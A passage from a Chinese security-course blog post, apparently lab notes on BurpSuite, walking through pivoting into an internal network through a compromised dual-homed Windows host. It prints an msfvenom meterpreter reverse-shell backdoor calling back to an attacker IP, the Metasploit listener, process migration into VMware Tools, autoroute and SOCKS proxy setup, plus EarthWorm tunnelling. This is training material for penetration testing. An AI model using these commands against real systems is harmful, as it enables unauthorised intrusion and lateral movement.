<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">本机攻击者   192.168.6.126</span><br><span class="line"></span><br><span class="line">windows10   192.168.6.221      10.10.10.128    受害者  双网卡</span><br><span class="line"></span><br><span class="line">windows2012   10.10.10.129      目标</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">当前以拿到windows10的主机权限，要访问2012</span><br></pre></td></tr></table></figure>
<h3 id="配置使用"><a class="markdownIt-Anchor" href="#配置使用">#</a> 配置使用</h3>
<p>在 windows10 上运行 ew，开启 socks5 服务，bp 通过配置 socks5 代理访问 windows2012；</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ew_for_Win.exe -s ssocksd -l 1080</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637720544345-4d8679b3-cda8-4ac9-b332-f5ca64ffca8b.png" alt="img"></p>
<p>访问 10 段的 80 端口：</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637720901621-3e7c4bf7-6aa9-4bec-927a-362ec089c5c6.png" alt="img"></p>
<h1 id="bp设置上游代理访问内网"><a class="markdownIt-Anchor" href="#bp设置上游代理访问内网">#</a> bp 设置上游代理访问内网</h1>
<h3 id="环境-2"><a class="markdownIt-Anchor" href="#环境-2">#</a> 环境</h3>
<p>在实际环境中，使用 msf 设置代理跨网段访问时，用的是 socks4a 模块，现在的最新版本的 msf 这个工具已经把 socks4a 模块集合到 socks 模块里面。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">代理通信流程：</span><br><span class="line">		</span><br><span class="line">    127.0.0.1:8080 --&gt; localhost:25378 --&gt; 192.168.6.128:1080  --&gt; 10.10.10.129:80  </span><br><span class="line">攻击机kali：192.168.6.38</span><br><span class="line"></span><br><span class="line">攻击机：192.168.6.126</span><br><span class="line"></span><br><span class="line">跳板机：192.168.6.221   10.10.10.128  双网卡</span><br><span class="line"></span><br><span class="line">目标机：10.10.10.129</span><br></pre></td></tr></table></figure>
<h3 id="配置使用-2"><a class="markdownIt-Anchor" href="#配置使用-2">#</a> 配置使用</h3>
<p>msf 生成后门，反连上线：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.6.38 lport=4455 -f</span><br><span class="line">exe &gt;r.exe</span><br></pre></td></tr></table></figure>
<p>传到跳板机，并运行，kali 开启 msf 监听：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload windows/meterpreter/reverse_tcp</span><br><span class="line">set lhost 192.168.6.38</span><br><span class="line">set lport 4455</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>
<p>得到一个 session 会话：</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637729927896-bf7d8afd-54ff-4d35-bc02-c53d2f9b5cb2.png" alt="img"></p>
<p>先做进程迁移，防止掉线：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">migrate 6920     //迁移到vm tools的进程里</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637730196067-df2c6cc1-ad88-49d3-a4ec-6582e303411b.png" alt="img"></p>
<p>接着，我们要在跳板机上做个代理，设置一个路由：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">run autoroute -s 10.10.10.0/24    //绑定10段的</span><br><span class="line"></span><br><span class="line">run autoroute -p   //查看是不是已经绑定</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637730339046-ccb184dc-4f03-43da-9cb1-fa45ae3960ee.png" alt="img"></p>
<p>绑定之后，做一个 socks 代理，使用 socks_proxy 模块  ：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">backgroupd</span><br><span class="line">use auxiliary/server/socks_proxy</span><br><span class="line">set version 4a     //设置socks版本，有4a，有5</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637730574825-a0c4c72c-6d87-4671-874c-45a3ed15b286.png" alt="img"></p>
<p>接着，我们在攻击机上做个代理，访问目标网站：</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637731059109-be502e2b-47a5-450c-84d8-8868a7f9723b.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637731074399-095c6bb4-649e-4a57-ae01-5ceb19e4842c.png" alt="img"></p>
<p>我们现在虽然可以访问了，但是我们的 bp 还是抓不到包的，因为我们的浏览器是走 sock4a 这条隧道出去的，但是不会走这条隧道回来；</p>
<p>那么，我们就要设置一下上游代理才能做到的包的抓取，让他们进行通信：</p>
<p>使用 SocksCap64 工具，进行 sock4a 隧道的连接：</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637731484326-00ba03e1-d534-4c18-b23d-4542b9a46954.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637731520004-406baca2-0e21-4a39-b293-12a155c8b36b.png" alt="img"></p>
<p>这时打开程序面板内的浏览器，访问目标机，也是可以访问的到的：</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637731654714-c9a1cd25-08bc-4af2-b781-7ea6f8b3c106.png" alt="img"></p>
<p>接着抓包，是可以抓到的，</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637731705499-98488382-245f-43ac-822f-74fa062716d6.png" alt="img"></p>
<p>右下角任务栏，系统代理 --&gt;  启用系统代理；</p>
<p>设置 bp 的顶级代理服务器 (sockscap 的系统代理端口：25378)：</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637732905946-d0638350-8f60-485e-a614-bbe65355f9bb.png" alt="img"></p>
<p>抓包测试：</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1637736142205-a25b1a29-6f27-4319-8544-316e4a65da92.png" alt="img"></p>
<iframe style="width: 1px; height: 1px; position: absolute; left: -100px; bottom: -100px; display: none;" src="https://tracert.alipay.com/cross.html"></iframe>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2022-04-13 09:29:26" itemprop="dateModified" datetime="2022-04-13T09:29:26+08:00">2022-04-13</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="John Doe 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="John Doe 支付宝">
        <p>支付宝</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="John Doe 贝宝">
        <p>贝宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>John Doe <i class="ic i-at"><em>@</em></i>Hexo
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://sun-spots.github.io/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/BurpSuite%E4%BD%BF%E7%94%A8/" title="BurpSuite使用">https://sun-spots.github.io/2022/03/04/信息安全/第二阶段/第一周/BurpSuite使用/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/%E8%B5%84%E4%BA%A7%E6%90%9C%E9%9B%86/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva2.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1giclimtf7dj20zk0m8qav.jpg" title="资产搜集">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> 信息安全—网络渗透</span>
  <h3>资产搜集</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%8A%EF%BC%89/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva2.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1giclwrdwyaj20zk0m8are.jpg" title="SQL注入上">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> 信息安全—网络渗透</span>
  <h3>SQL注入上</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">
<div id="music163player">
	<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 AUTOSTART="TRUE" src="//music.163.com/outchain/player?type=2&id=1931475051&auto=1&height=66"></iframe>
<div>
  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AC%AC%E4%B8%89%E5%A4%A9burpsuite%E4%BD%BF%E7%94%A8"><span class="toc-number">1.</span> <span class="toc-text"> 第三天：BurpSuite 使用</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#img"><span class="toc-number">2.</span> <span class="toc-text"> </span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E9%85%8D%E7%BD%AE"><span class="toc-number">3.</span> <span class="toc-text"> 环境变量配置</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#burp%E7%AE%80%E4%BB%8B%E5%8F%8A%E9%85%8D%E7%BD%AE"><span class="toc-number">4.</span> <span class="toc-text"> Burp 简介及配置</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#burp%E7%AE%80%E4%BB%8B"><span class="toc-number">4.1.</span> <span class="toc-text"> Burp 简介</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A0%B4%E8%A7%A3%E6%AD%A5%E9%AA%A4"><span class="toc-number">4.1.1.</span> <span class="toc-text"> 破解步骤</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#burp%E9%85%8D%E7%BD%AE"><span class="toc-number">4.2.</span> <span class="toc-text"> Burp 配置</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#burp%E4%BD%BF%E7%94%A8"><span class="toc-number">5.</span> <span class="toc-text"> Burp 使用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8A%93%E5%8C%85"><span class="toc-number">5.1.</span> <span class="toc-text"> 抓包</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#burp%E6%A8%A1%E5%9D%97%E4%BB%8B%E7%BB%8D"><span class="toc-number">5.2.</span> <span class="toc-text"> Burp 模块介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%AA%E8%A1%A8%E7%9B%98dashboard"><span class="toc-number">5.2.1.</span> <span class="toc-text"> 仪表盘 (Dashboard)：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E6%A0%87target"><span class="toc-number">5.2.2.</span> <span class="toc-text"> 目标 (Target)：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%BB%E5%8A%A8%E6%89%AB%E6%8F%8Factive-scanning"><span class="toc-number">5.2.2.1.</span> <span class="toc-text"> 主动扫描（Active Scanning）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%A2%AB%E5%8A%A8%E6%89%AB%E6%8F%8Fpassive-scanning"><span class="toc-number">5.2.2.2.</span> <span class="toc-text"> 被动扫描（Passive Scanning）</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%A3%E7%90%86proxy"><span class="toc-number">5.2.3.</span> <span class="toc-text"> 代理 (Proxy)：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%A5%E4%BE%B5intruder"><span class="toc-number">5.2.4.</span> <span class="toc-text"> 入侵 (Intruder)：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E7%9A%84%E5%BA%94%E7%94%A8%E5%9C%BA%E6%99%AF"><span class="toc-number">5.2.4.1.</span> <span class="toc-text"> 常用的应用场景：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#positions%E4%BD%8D%E7%BD%AE"><span class="toc-number">5.2.4.2.</span> <span class="toc-text"> Positions (位置)：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#attack-type-%E6%94%BB%E5%87%BB%E7%B1%BB%E5%9E%8B"><span class="toc-number">5.2.4.3.</span> <span class="toc-text"> Attack type 攻击类型:</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%87%8D%E6%94%BErepeater"><span class="toc-number">5.2.5.</span> <span class="toc-text"> 重放 (Repeater)：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BA%8F%E5%88%97%E5%99%A8sequencer"><span class="toc-number">5.2.6.</span> <span class="toc-text"> 序列器 (Sequencer)：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#live-capture-%E4%BF%A1%E6%81%AF%E6%88%AA%E5%8F%96"><span class="toc-number">5.2.6.1.</span> <span class="toc-text"> Live capture 信息截取：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#manual-load-%E6%89%8B%E5%8A%A8%E5%8A%A0%E8%BD%BD"><span class="toc-number">5.2.6.2.</span> <span class="toc-text"> Manual load 手动加载：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A7%A3%E7%A0%81%E5%99%A8decoder"><span class="toc-number">5.2.7.</span> <span class="toc-text"> 解码器 (Decoder)：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AF%B9%E6%AF%94comparper"><span class="toc-number">5.2.8.</span> <span class="toc-text"> 对比 (Comparper)：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%A9%E5%B1%95extender"><span class="toc-number">5.2.9.</span> <span class="toc-text"> 扩展 (Extender)：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%85%A8%E5%B1%80%E5%8F%82%E6%95%B0%E8%AE%BE%E7%BD%AEproject-options"><span class="toc-number">5.2.10.</span> <span class="toc-text"> 全局参数设置 (project options)：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#burp-%E7%BD%91%E7%BB%9C%E8%BF%9E%E6%8E%A5%E8%AE%BE%E7%BD%AEconnections"><span class="toc-number">5.2.10.1.</span> <span class="toc-text"> Burp 网络连接设置 (Connections) ：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%94%A8%E6%88%B7%E7%9A%84%E8%AE%BE%E7%BD%AEuser-options"><span class="toc-number">5.2.11.</span> <span class="toc-text"> 用户的设置 (user options)</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#display"><span class="toc-number">5.2.11.1.</span> <span class="toc-text"> display：</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%8A%93app%E5%8C%85"><span class="toc-number">6.</span> <span class="toc-text"> 抓 APP 包</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#burp%E8%AE%BE%E7%BD%AE"><span class="toc-number">6.0.0.1.</span> <span class="toc-text"> burp 设置</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%A8%A1%E6%8B%9F%E5%99%A8%E8%AE%BE%E7%BD%AE"><span class="toc-number">6.0.0.2.</span> <span class="toc-text"> 模拟器设置</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#bp%E8%AE%BE%E7%BD%AEsocks5%E4%BB%A3%E7%90%86%E8%AE%BF%E9%97%AE%E5%86%85%E7%BD%91"><span class="toc-number">7.</span> <span class="toc-text"> BP 设置 socks5 代理访问内网</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83"><span class="toc-number">7.0.1.</span> <span class="toc-text"> 环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E4%BD%BF%E7%94%A8"><span class="toc-number">7.0.2.</span> <span class="toc-text"> 配置使用</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#bp%E8%AE%BE%E7%BD%AE%E4%B8%8A%E6%B8%B8%E4%BB%A3%E7%90%86%E8%AE%BF%E9%97%AE%E5%86%85%E7%BD%91"><span class="toc-number">8.</span> <span class="toc-text"> bp 设置上游代理访问内网</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83-2"><span class="toc-number">8.0.1.</span> <span class="toc-text"> 环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E4%BD%BF%E7%94%A8-2"><span class="toc-number">8.0.2.</span> <span class="toc-text"> 配置使用</span></a></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/2022/01/10/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/1.1%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5/" rel="bookmark" title="计算机的基本概念">计算机的基本概念</a></li><li><a href="/2022/01/11/%E4%BF%AE%E6%94%B9/2022-01-11-%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/" rel="bookmark" title="计算机网络">计算机网络</a></li><li><a href="/2022/01/13/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/1.4web%E7%AB%99%E7%82%B9%E6%90%AD%E5%BB%BA/" rel="bookmark" title="web站点搭建">web站点搭建</a></li><li><a href="/2022/01/15/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/1.5MySQL%E5%9F%BA%E6%9C%AC%E8%AF%AD%E6%B3%95%E5%8F%8Asql%E6%B3%A8%E5%85%A5/" rel="bookmark" title="MySQL基本语法及sql注入">MySQL基本语法及sql注入</a></li><li><a href="/2022/01/19/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/1.3HTTP%E9%80%9A%E4%BF%A1%E5%9F%BA%E7%A1%80/" rel="bookmark" title="计算机的基本概念">计算机的基本概念</a></li><li><a href="/2022/01/19/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/2.3DHCP%E4%B8%8EWDS%E6%9C%8D%E5%8A%A1/" rel="bookmark" title="DNCP与WDS服务">DNCP与WDS服务</a></li><li><a href="/2022/01/19/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/1.2%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/" rel="bookmark" title="计算机的基本概念">计算机的基本概念</a></li><li><a href="/2022/01/19/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/2.1WEB-CA%E8%AF%81%E4%B9%A6/" rel="bookmark" title="WEB/CA证书">WEB/CA证书</a></li><li><a href="/2022/01/19/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/2.2FTP-DNS%E6%9C%8D%E5%8A%A1/" rel="bookmark" title="FTP/DNS服务">FTP/DNS服务</a></li><li><a href="/2022/01/21/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/2.5%E5%9F%9F%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%E4%B8%8E%E7%AE%A1%E7%90%86/" rel="bookmark" title="域环境搭建与管理">域环境搭建与管理</a></li><li><a href="/2022/03/02/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4/" rel="bookmark" title="密码爆破">密码爆破</a></li><li><a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%AE%80%E4%BB%8B/" rel="bookmark" title="渗透测试简介">渗透测试简介</a></li><li><a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/%E8%B5%84%E4%BA%A7%E6%90%9C%E9%9B%86/" rel="bookmark" title="资产搜集">资产搜集</a></li><li class="active"><a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/BurpSuite%E4%BD%BF%E7%94%A8/" rel="bookmark" title="BurpSuite使用">BurpSuite使用</a></li><li><a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%8A%EF%BC%89/" rel="bookmark" title="SQL注入上">SQL注入上</a></li><li><a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/XSS%E6%94%BB%E5%87%BB/" rel="bookmark" title="XSS攻击">XSS攻击</a></li><li><a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%BA%8C%E5%91%A8/CRSF%E6%94%BB%E5%87%BB/" rel="bookmark" title="CSRF跨站脚本攻击">CSRF跨站脚本攻击</a></li><li><a href="/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/SSRF/" rel="bookmark" title="SSRF">SSRF</a></li><li><a href="/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/XXE/" rel="bookmark" title="XXE">XXE</a></li><li><a href="/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/linux%E5%8F%91%E5%B1%95%E4%B8%8E%E5%9F%BA%E7%A1%80/" rel="bookmark" title="linux的发展与基础">linux的发展与基础</a></li><li><a href="/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/%E8%BD%AF%E4%BB%B6%E5%8C%85%E7%AE%A1%E7%90%86%E4%B8%8E%E6%9D%83%E9%99%90%E7%AE%A1%E7%90%86/" rel="bookmark" title="软件包管理与权限管理">软件包管理与权限管理</a></li><li><a href="/2022/03/09/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BA%E4%B8%8E%E9%98%B2%E7%81%AB%E5%A2%99/" rel="bookmark" title="linux的web服务器的搭建">linux的web服务器的搭建</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="John Doe"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">John Doe</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">37</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">3</span>
        <span class="name">分类</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/%E8%B5%84%E4%BA%A7%E6%90%9C%E9%9B%86/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2022/03/04/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%80%E5%91%A8/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%8A%EF%BC%89/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E2%80%94%E7%BD%91%E7%BB%9C%E6%B8%97%E9%80%8F/" title="分类于 信息安全—网络渗透">信息安全—网络渗透</a>
</div>

    <span><a href="/2022/03/08/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E7%AC%AC%E4%BA%8C%E9%98%B6%E6%AE%B5/%E7%AC%AC%E4%B8%89%E5%91%A8/SSRF/" title="SSRF">SSRF</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web/" title="分类于 web前端">web前端</a>
</div>

